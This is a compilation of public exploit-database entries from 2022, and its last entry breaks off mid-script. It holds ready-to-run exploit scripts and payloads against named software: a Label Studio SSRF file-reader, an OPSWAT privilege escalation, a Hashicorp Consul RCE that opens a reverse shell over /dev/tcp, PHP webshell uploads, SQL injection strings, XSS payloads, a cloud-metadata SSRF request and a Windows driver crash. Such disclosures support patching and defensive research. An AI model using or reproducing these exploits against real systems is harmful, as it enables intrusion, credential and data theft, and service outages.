ISHACK AI BOT

# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) # Date: 2022-09-18 # Exploit Author: zetc0de # Vendor Homepage: https://www.boxbilling.org/ # Software Link: https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip # Version: <=4.22.1.5 (Latest) # Tested on: Windows 10 # CVE : CVE-2022-3552 # BoxBilling was vulnerable to Unrestricted File Upload. # In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS. # With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE ################################################################################### ## POC POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1 Host: local.com:8089 Content-Length: 52 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d Connection: close order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> POC Video : https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing

# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) # Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition" # Date: 2022-10-03 # Exploit Author: @DeveloperNinja, [email protected] # Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/ # Software Link: https://github.com/heartexlabs/label-studio/releases # Version: <=1.5.0 # CVE : CVE-2022-36551 # Docker Container: heartexlabs/label-studio # Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote # attacker to create a new account and then exploit the SSRF. # # This exploit has been tested on Label Studio 1.5.0 # # Exploit Usage Examples (replace with your target details): # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /etc/passwd # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /proc/self/environ # - python3 exploit.py --url http://localhost:8080/ --username "[email protected]" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3 import json import argparse import requests import shutil from urllib.parse import urljoin from urllib.parse import urlparse requests.packages.urllib3.disable_warnings() # main function for exploit def main(url, filePath, writePath, username, password, shouldRegister): # check if the URL is reachable try: r = requests.get(url, verify=False) if r.status_code == 200: print("[+] URL is reachable") else: print("[!] Error: URL is not reachable, check the URL and try again") exit(1) except requests.exceptions.RequestException as e: print("[!] Error: URL is not reachable, check the URL and try again") exit(1) session = requests.Session() login(session, url, username, password, shouldRegister) print("[+] Logged in") print("[+] Creating project...") # Create a temp project projectDetails = create_project(session, url) print("[+] Project created, ID: {}".format(projectDetails["id"])) #time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ) print("[+] Attempting to fetch: {}".format(filePath)) fetch_file(session, url, projectDetails["id"], filePath, writePath) print("[+] Deleting Project.. {}".format(projectDetails["id"])) delete_project(session, url, projectDetails["id"]) print("[+] Project Deleted") print("[*] Finished executing exploit") # login, logs the user in def login(session, url, username, password, shouldRegister): # hit the main page first to get the CSRF token set r = session.get(url, verify=False) r = session.post( urljoin(url, "/user/login"), data={ "email": username, "password": password, "csrfmiddlewaretoken": session.cookies["csrftoken"], }, verify=False ) if r.status_code == 200 and r.text.find("The email and password you entered") < 0: return elif r.text.find("The email and password you entered") > 0 and shouldRegister: print("[!] Account does not exist, registering...") r = session.post( urljoin(url, "/user/signup/"), data={ "email": username, "password": password, "csrfmiddlewaretoken": session.cookies["csrftoken"], 'allow_newsletters': False, }, ) if r.status_code == 302: # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default) return else: print("[!] Error: Could not login, check the credentials and try again") exit(1) # create_project creates a temporary project for exploiting the SSRF def create_project(session, url): r = session.post( urljoin(url, "/api/projects"), data={ "title": "TPS Report Finder", }, verify=False ) if r.status_code == 200 or r.status_code == 201: return r.json() else: print("[!] Error: Could not create project, check your credentials / permissions") exit(1) def fetch_file(session, url, projectId, filePath, writePath): # if scheme is empty prepend file:// parsedFilePath = urlparse(filePath) if parsedFilePath.scheme == "": filePath = "file://" + filePath headers = { 'Content-Type': 'application/x-www-form-urlencoded' } url = urljoin(url, "/api/projects/{}/import".format(projectId)) r = session.post(url, data={ "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL }, headers=headers, verify=False ) if r.status_code == 201: # file found! -- first grab the file path details fileId = r.json()["file_upload_ids"][0] r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False) r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True) print("[+] File found!") # if user wants to write to disk, make it so if writePath != None: print("[+] Writing to {}".format(writePath)) # write the file to disk with open(writePath, 'wb') as handle: shutil.copyfileobj(r.raw, handle) handle.close() return else: print("==========================================================") print(r.text) print("==========================================================") return else: print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ") print("\t" + r.json()["validation_errors"]["non_field_errors"][0]) return def delete_project(session, url, projectId): url = urljoin(url, "/api/projects/{}".format(projectId)) r = session.delete(url, verify=False) if r.status_code == 200 or r.status_code == 204: return else: print( "[!] Error: Could not delete project, check your credentials / permissions") exit(1) parser = argparse.ArgumentParser() parser.add_argument("--url", required=True, help="Label Studio URL") parser.add_argument("--file", required=True, help="Path to the file you want to fetch") parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT") parser.add_argument("--username", required=False, help="Username for existing account (email)") parser.add_argument("--password", required=False, help="Password for existing account") parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist", ) args = parser.parse_args() main(args.url, args.file, args.out, args.username, args.password, args.register)

# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) # Date: 2022-08-10 # Exploit Author: Sinem Şahin # Vendor Homepage: https://intelliants.com/ # Version: 4.2.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/panel/fields/add 2- Write XSS Payload into the tooltip value of the field add page. 3- Press "Save" button. 4- Go to the following url. => http://(HOST)/panel/members/add XSS Payload ==> "<script>alert("field_tooltip_XSS")</script> Reference: ://github.com/intelliants/subrion/issues/895

#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) #Date: 24/10/2022 #Exploit Author: Hosein Vita & Milad Fadavvi #Vendor Homepage: https://github.com/zalando/skipper #Software Link: https://github.com/zalando/skipper #Version: < v0.13.237 #Tested on: Linux #CVE: CVE-2022-38580 Summary: Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request. Proof Of Concept: 1- Add header "X-Skipper-Proxy" to your request 2- Add the aws metadata to the path GET /latest/meta-data/iam/security-credentials HTTP/1.1 Host: yourskipperdomain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 X-Skipper-Proxy: http://169.254.169.254 Connection: close Reference: https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2

# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication # Exploit Author: RedTeam Pentesting GmbH # CVE: CVE-2022-42953 Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface The ZKTeco time attendance device does not require authentication to use the web interface, exposing the database of employees and their credentials. Details ======= Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210) Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210) Vulnerability Type: Missing Authentication Security Risk: medium Vendor URL: https://zkteco.eu/company/history Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003 Advisory Status: published CVE: CVE-2022-42953 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953 Introduction ============ "Time attendance and workforce management is an integrated set of processes that an institution uses to optimize the productivity of its employees on the individual, departmental, and entity-wide levels. ZKTeco has been at the forefront of time attendance solutions for the last 30 years, integrating advanced biometric technologies with innovative and versatile terminals." (from company website) More Details ============ The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials which may be used to log into the device to prove the users' attendance. These credentials can either be a PIN, a card for a variety of card readers, or a fingerprint. The user list can be managed through the web interface. When opening the web interface, for example on http://192.0.2.1/, the web server of the device sends a Set-Cookie header for a cookie with name and value similar to the following: ----------------------------------------------------------------------- Set-Cookie: SessionID=1624553126; path=/; ----------------------------------------------------------------------- It was determined that the value of the cookie is roughly the number of seconds since January 1, 1970. Since the value has a constant offset, that might allow attackers to guess the cookie value. After setting the cookie, the webserver redirects the browser to "/csl/login". The login form provided at this URL has its form action set to "/csl/check". If the user provides wrong credentials, the web server responds with an error message. If the user provides correct credentials, the server responds with a frameset. In this frameset various options are available, for example a user list. The list contains a link titled "Options" for each user item which references a URL similar to the following http://192.0.2.1/csl/user?did=0&uid=123 Additionally, backups of all settings of the device can be downloaded from the backup page. The request to do so looks similar to the following: ----------------------------------------------------------------------- POST /form/DataApp HTTP/1.1 Host: 192.0.2.1 User-Agent: Mozilla/5.0 Cookie: SessionID=1624553126 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 7 Origin: http://192.0.2.1 Referer: http://192.0.2.1/form/Device?act=11 style=1 ----------------------------------------------------------------------- When the value "1" is given for the field named "style", the web server responds with the file "device.dat" (corresponding to the option "Backup System Data" in the web interface), for all other values the server responds with the file "data.dat" (corresponding to the option "Backup User Data" in the web interface). Both files can not only be requested using HTTP-POST, but also using HTTP-GET with the following URLs: http://192.0.2.1/form/DataApp?style=1 http://192.0.2.1/form/DataApp?style=0 Both files are - even though it's not obvious from the filename - compressed tar archives. They can be extracted in the following way: ----------------------------------------------------------------------- $ mv data.dat data.tgz $ tar xvzf data.tgz rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat ----------------------------------------------------------------------- In this archive, the file "mnt/mtdblock/templatev10.dat" will likely contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains the user database. The user database contains 72 byte user records, each containing the privilege level, the PIN, the name of the user, data stored on external authentication tokens like cards, and the group of the user. While the cookie value might be guessable, it is not used for authentication purposes. An attacker with knowledge of the corresponding URLs could access the user detail view or the backup without any authentication. Proof of Concept ================ http://192.0.2.1/form/DataApp?style=1 http://192.0.2.1/form/DataApp?style=0 http://192.0.2.1/csl/user?did=0&uid=123 Workaround ========== Network access to the device should be limited to trustworthy persons. This might be hard to implement if the device is installed in a public space, especially if it is used for access control, too. Fix === Currently, it is not known whether a newer version might fix this issue. Due to the age of the product, the vendor might decide not to create a fix at all. Security Risk ============= Attackers with network access to a ZKTeco ZEM/ZMM time attendance device can get access to employee data, including the credentials used for accessing the time attendance device. If these credentials are used for other purposes than time attendance, such as physical access control, attackers might use them to gain access to protected areas. The actual risk estimate varies wildly with the kind of access control system in place and whether network access to the device is prevented by other means, such as nearby security guards. For this reason, missing authentication to the ZEM/ZMM web interface is estimated to pose a medium risk. This estimate might need to be adjusted to the specific use case of the device. Timeline ======== 2021-06-24 Vulnerability identified 2021-07-12 Customer approved disclosure to vendor 2021-07-16 Vendor notified 2021-08-20 Vendor provides fixed firmware 2022-09-29 Customer approved release of advisory 2022-10-10 CVE ID requested 2022-10-15 CVE ID assigned 2022-10-24 Advisory published References ========== https://zkteco.eu/company/history RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation # Date: 24 October 2022 # Exploit Author: Ulascan Yildirim # Vendor Homepage: https://www.opswat.com/ # Version: Metadefender Core 4.21.1 # Tested on: Windows / Linux # CVE : CVE-2022-32272 # ============================================================================= # This is a PoC for the Metadefender Core Privilege escalation vulnerability. # To use this PoC, you need a Username & Password. # The OMS_CSRF_TOKEN allows users to execute commands with higher privileges. # ============================================================================= #!/usr/bin/env python3 import requests import json from getpass import getpass url = input("Enter URL in this Format (http://website.com): ") username = input("Username: ") password = getpass("Password: ") url_login = url+'/login' url_user = url+'/user' logindata = {"user":username,"password":password} ## Get the OMS_CSRF_TOKEN & session cookie response_login = requests.post(url_login, json = logindata).json() json_str = json.dumps(response_login) resp = json.loads(json_str) token = resp['oms_csrf_token'] session = resp['session_id'] ## Prepare Header & Cookie headers = { "oms_csrf_token": token, } cookie = { "session_id_ometascan": session } ## Set Payload to get Admin role payload = '{"roles": ["1"]}' response = requests.put(url_user,headers=headers,cookies=cookie,data=payload) print("Response status code: "+str(response.status_code)) if response.status_code == 200: print("Expolit Successful!") else: print("Exploit Unsuccessful")

// Exploit Title: Tunnel Interface Driver - Denial of Service // Date: 07/15/2022 // Exploit Author: ExAllocatePool2 // Vendor Homepage: https://www.microsoft.com/ // Software Link: https://www.microsoft.com/en-us/software-download/windows10 // Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288) // Tested on: Microsoft Windows // GitHub Repository: https://github.com/Exploitables/MSRC-1 #include <Windows.h> #include <stdio.h> #define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl" int main(int argc, char** argv); int main(int argc, char** argv) { HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0); unsigned long long input_output = 0x4242424242424242; unsigned long bytes_returned = 0x43434343; unsigned char unused = 0; SetConsoleTitleA("https://msrc.microsoft.com/"); printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!"); if (h_driver == (HANDLE)-1) { printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError()); unused = getchar(); return 1; } printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver); printf("\n[!] Triggering a denial of service via arbitrary read in 3..."); for (int i = 2; i > 0; i--) { Sleep(1000); printf("\n[!] %d...", i); } DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0); unused = getchar(); printf("\n[-] Exploit failed. The machine should have crashed."); return 0; }

# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS) # Date: 26/10/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://moodle.org/ # Software Link: https://git.in.moodle.com/moodle # Version: 4.0 # Tested on: XAMPP, Windows 10 # Contact: https://twitter.com/dmaral3noz Description: A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License Vulnerable Code: line 111 in file "course/search.php" echo $courserenderer->search_courses($searchcriteria); Steps to exploit: 1) Go to http://localhost/course/search.php 2) Insert your payload in the "search" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)>

## Title: Social-Share-Buttons v2.2.3 - SQL Injection ## Author: nu11secur1ty ## Date: 09.16.2022 ## Vendor: https://wordpress.org/ ## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3 ## Description: The `project_id` parameter from the Social Share Buttons-2.2.3 on the WordPress-6.0.2 system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this system and he can use it for very malicious purposes. WARNING: The attacker can retrieve all-database from this system! NOTE: The users of this system are NOT protected, this SQL vulnerability is CRITICAL! STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=social-sharing-share&project_id=378116348' or '3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND 'KWbC'='KWbC&network_id=5&post_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3) ## Proof and Exploit: [href](https://streamable.com/m9r76w) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE) # Date: 26/10/2022 # Exploit Author: GatoGamer1155, 0bfxgh0st # Vendor Homepage: https://www.consul.io/ # Description: Exploit for gain reverse shell on Remote Command Execution via API # References: https://www.consul.io/api/agent/service.html # Tested on: Ubuntu Server # Software Link: https://github.com/hashicorp/consul import requests, sys if len(sys.argv) < 6: print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n") exit(1) target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register" headers = {"X-Consul-Token": f"{sys.argv[5]}"} json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80} try: requests.put(target, headers=headers, json=json) print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n") except: print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")

# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) # Date: 9 October 2022 # Exploit Author: Okan Kurtulus # Vendor Homepage: https://reqlogic.com # Version: 11.3 # Tested on: Linux # CVE : 2022-41441 # Proof of Concept: 1- Install ReQlogic v11.3 2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3 3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters. #XSS Payload: </script><script>alert(1)</script> #Affected Prameters POBatch WaitDuration #Final URLs http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3 http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload # Exploit Author: d1z1n370/oPty # Date: 01/11/2022 # Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088 # Tested on: Linux # Version: 1.0.8 # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. # PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/dashboard/settings X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062 Content-Length: 449 Connection: close Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="_token" kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="is_modal" 1 -----------------------------115904534120015298741783774062 Content-Disposition: form-data; name="file"; filename="upload.php56" Content-Type: image/gif GIF89a; <?php system($_GET['a']); phpinfo(); ?> -----------------------------115904534120015298741783774062--

## Title: Senayan Library Management System v9.5.0 - SQL Injection ## Author: nu11secur1ty ## Date: 11.03.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0 ## Description: The `keywords` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The injection is confirmed manually from nu11secur1ty. The attacker can retrieve all information from the database of this system, by using this vulnerability. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL --- Parameter: keywords (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0) ## Proof and Exploit: [href](https://streamable.com/63og5v) ## Time spent `3:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) # Date: 11/05/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://www.wpallimport.com/ # Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version) # Version: <= 3.6.7 (tested: 3.6.7) # Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload) # CVE: CVE-2022-1565 #!/usr/bin/python import requests import re import os # WARNING: This exploit does NOT include the payload. # Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work. # If a file with the same name as the payload is already on the server, the upload will OVERWRITE it # # Please notice that I'm NOT the researcher who found this vulnerability # # # # # VULNERABILITY DESCRIPTION # # # # # # The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. # This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. # # # # # HOW THE EXPLOIT WORKS # # # # # # 1. Prepare the zip file: # - create a PHP file with your payload (e.g. rerverse shell) # - set the variable "payload_file_name" with the name of this file (e.g. "shell.php") # - create a zip file with the payload # - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip") # # 2. Login using an administrator account: # - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /) # - set the variable "admin_user" with the username of an administrator account # - set the variable "admin_pass" with the password of an administrator account # # 3. Get the wpnonce using the get_wpnonce_upload_file() method # - there are actually 2 types of wpnonce: # - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class. # This wpnonce allows us to change the plugin settings (check the step 4) # - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class. # This wpnonce allows us to upload the file # # 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class # - if the Secure Mode is enabled, the zip content will be put in a folder with a random name. # The exploit will disable the Secure Mode. # By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url). # The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) # - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode. # # 5. Upload the file using the upload_file(wpnonce_upload_file: str) method # - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully. # The response will contain a JSON that looks like this: # {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"} # As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed # # 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method # # 7. Activate the payload using the activate_payload() method # - you can define a method to activate the payload. # There reason behind this choice is that this exploit does NOT provide any payload. # Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters # # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # # # According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page" # I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?) # I had to find a workaround and so I did, by exploiting this option. # WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7 # # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # # # In order for the exploit to work please consider the following: # 1. check the target_url and the admin credentials # 2. check the path of the zip file and the name of the payload (they can be different) # 3. if you're testing locally, try to set verify_ssl_certificate on False # 4. you can use print_response(http_response) to investigate further # Configure the following variables: target_url = "https://vulnerable.wp/wordpress" # Target base URL admin_user = "admin" # Administrator username admin_pass = "password" # Administrator password zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip) payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell) verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed. # Do NOT change the following variables wp_login_url = target_url + "/wp-login.php" # WordPress login page wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here re_enable_secure_mode = False session = requests.Session() # This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files. class PluginSetting: # Regular 